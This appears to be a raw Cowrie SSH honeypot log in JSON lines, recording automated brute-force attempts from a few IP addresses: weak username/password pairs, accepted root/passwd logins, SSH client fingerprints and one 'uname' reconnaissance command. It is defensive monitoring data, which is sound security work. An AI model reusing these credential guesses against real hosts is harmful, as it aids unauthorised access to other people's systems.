{"eventid":"cowrie.login.failed","username":"user","password":"12345678","message":"login attempt [user/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:49:40.679506Z","src_ip":"212.227.125.160","session":"c70a0729cc1f"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:49:42.251049Z","src_ip":"212.227.125.160","session":"c70a0729cc1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43862,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea779ffdd29d","protocol":"ssh","message":"New connection: 212.227.125.160:43862 (1.2.3.4:22) [session: ea779ffdd29d]","sensor":"my-vps","timestamp":"2025-08-31T06:49:53.945283Z"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:49:54.743637Z","src_ip":"212.227.125.160","session":"fa9037473e40"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:49:58.290263Z","src_ip":"212.227.125.160","session":"ea779ffdd29d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:49:58.291704Z","src_ip":"212.227.125.160","session":"ea779ffdd29d"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:49:58.833711Z","src_ip":"212.227.235.229","session":"7ccc8568f57f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:04.425338Z","src_ip":"176.65.148.193","session":"284762db47bc"}
{"eventid":"cowrie.session.closed","duration":180.07638883590698,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:04.430179Z","src_ip":"176.65.148.193","session":"284762db47bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:50:07.702249Z","src_ip":"212.227.125.160","session":"fa9037473e40"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:50:07.702966Z","src_ip":"212.227.125.160","session":"fa9037473e40"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:50:14.471254Z","src_ip":"212.227.235.229","session":"7ccc8568f57f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:50:14.472049Z","src_ip":"212.227.235.229","session":"7ccc8568f57f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52192,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c109dbcb678","protocol":"ssh","message":"New connection: 212.227.235.229:52192 (1.2.3.4:22) [session: 6c109dbcb678]","sensor":"my-vps","timestamp":"2025-08-31T06:50:14.530441Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:14.642400Z","src_ip":"212.227.125.160","session":"fa9037473e40"}
{"eventid":"cowrie.session.closed","duration":"98.5","message":"Connection lost after 98.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:14.643629Z","src_ip":"212.227.125.160","session":"fa9037473e40"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:50:15.197915Z","src_ip":"212.227.235.229","session":"6c109dbcb678"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:50:15.198597Z","src_ip":"212.227.235.229","session":"6c109dbcb678"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-31T06:50:18.730311Z","src_ip":"212.227.125.160","session":"ea779ffdd29d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"5.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:19.951602Z","src_ip":"212.227.235.229","session":"7ccc8568f57f"}
{"eventid":"cowrie.session.closed","duration":"84.7","message":"Connection lost after 84.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:19.952687Z","src_ip":"212.227.235.229","session":"7ccc8568f57f"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456789","message":"login attempt [user/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T06:50:20.868675Z","src_ip":"212.227.235.229","session":"6c109dbcb678"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32858,"dst_ip":"1.2.3.4","dst_port":22,"session":"a901b1725897","protocol":"ssh","message":"New connection: 212.227.235.229:32858 (1.2.3.4:22) [session: a901b1725897]","sensor":"my-vps","timestamp":"2025-08-31T06:50:20.956299Z"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:22.714826Z","src_ip":"212.227.235.229","session":"6c109dbcb678"}
{"eventid":"cowrie.session.closed","duration":"32.5","message":"Connection lost after 32.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:26.457861Z","src_ip":"212.227.125.160","session":"ea779ffdd29d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:50:27.447822Z","src_ip":"212.227.235.229","session":"a901b1725897"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:50:27.448783Z","src_ip":"212.227.235.229","session":"a901b1725897"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41818,"dst_ip":"1.2.3.4","dst_port":22,"session":"44c090e4c77b","protocol":"ssh","message":"New connection: 212.227.125.160:41818 (1.2.3.4:22) [session: 44c090e4c77b]","sensor":"my-vps","timestamp":"2025-08-31T06:50:35.795451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:50:36.327290Z","src_ip":"212.227.125.160","session":"44c090e4c77b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:50:36.379630Z","src_ip":"212.227.125.160","session":"44c090e4c77b"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456789","message":"login attempt [user/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T06:50:38.517497Z","src_ip":"212.227.125.160","session":"44c090e4c77b"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:40.005909Z","src_ip":"212.227.125.160","session":"44c090e4c77b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58452,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cd9c04db2a7","protocol":"ssh","message":"New connection: 217.72.205.35:58452 (1.2.3.4:22) [session: 3cd9c04db2a7]","sensor":"my-vps","timestamp":"2025-08-31T06:50:40.035055Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:40.036327Z","src_ip":"217.72.205.35","session":"3cd9c04db2a7"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-31T06:50:41.419596Z","src_ip":"212.227.235.229","session":"a901b1725897"}
{"eventid":"cowrie.session.closed","duration":"24.0","message":"Connection lost after 24.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:50:44.969810Z","src_ip":"212.227.235.229","session":"a901b1725897"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47468,"dst_ip":"1.2.3.4","dst_port":22,"session":"9816a9d5cf0b","protocol":"ssh","message":"New connection: 212.227.125.160:47468 (1.2.3.4:22) [session: 9816a9d5cf0b]","sensor":"my-vps","timestamp":"2025-08-31T06:50:53.976488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:50:57.133700Z","src_ip":"212.227.125.160","session":"9816a9d5cf0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:50:57.134934Z","src_ip":"212.227.125.160","session":"9816a9d5cf0b"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-31T06:51:07.220632Z","src_ip":"212.227.125.160","session":"9816a9d5cf0b"}
{"eventid":"cowrie.session.closed","duration":"17.2","message":"Connection lost after 17.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:51:11.197643Z","src_ip":"212.227.125.160","session":"9816a9d5cf0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48766,"dst_ip":"1.2.3.4","dst_port":22,"session":"939e6a4ab5fd","protocol":"ssh","message":"New connection: 212.227.235.229:48766 (1.2.3.4:22) [session: 939e6a4ab5fd]","sensor":"my-vps","timestamp":"2025-08-31T06:51:13.064619Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58492,"dst_ip":"1.2.3.4","dst_port":22,"session":"563ab09cb941","protocol":"ssh","message":"New connection: 212.227.235.229:58492 (1.2.3.4:22) [session: 563ab09cb941]","sensor":"my-vps","timestamp":"2025-08-31T06:51:13.821124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:51:14.557775Z","src_ip":"212.227.235.229","session":"563ab09cb941"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:51:14.558454Z","src_ip":"212.227.235.229","session":"563ab09cb941"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:51:15.074209Z","src_ip":"212.227.235.229","session":"939e6a4ab5fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:51:15.075364Z","src_ip":"212.227.235.229","session":"939e6a4ab5fd"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:51:20.247777Z","src_ip":"212.227.235.229","session":"563ab09cb941"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:51:22.070167Z","src_ip":"212.227.235.229","session":"563ab09cb941"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-31T06:51:29.070595Z","src_ip":"212.227.235.229","session":"939e6a4ab5fd"}
{"eventid":"cowrie.session.closed","duration":"20.1","message":"Connection lost after 20.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:51:33.207124Z","src_ip":"212.227.235.229","session":"939e6a4ab5fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54058,"dst_ip":"1.2.3.4","dst_port":22,"session":"01affe170546","protocol":"ssh","message":"New connection: 212.227.125.160:54058 (1.2.3.4:22) [session: 01affe170546]","sensor":"my-vps","timestamp":"2025-08-31T06:51:34.595163Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48396,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b6d2b53f050","protocol":"ssh","message":"New connection: 212.227.125.160:48396 (1.2.3.4:22) [session: 4b6d2b53f050]","sensor":"my-vps","timestamp":"2025-08-31T06:51:34.861248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:51:35.427452Z","src_ip":"212.227.125.160","session":"4b6d2b53f050"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:51:35.428159Z","src_ip":"212.227.125.160","session":"4b6d2b53f050"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40584,"dst_ip":"1.2.3.4","dst_port":22,"session":"f86ae0533881","protocol":"ssh","message":"New connection: 212.227.235.229:40584 (1.2.3.4:22) [session: f86ae0533881]","sensor":"my-vps","timestamp":"2025-08-31T06:51:35.561970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:51:35.564138Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
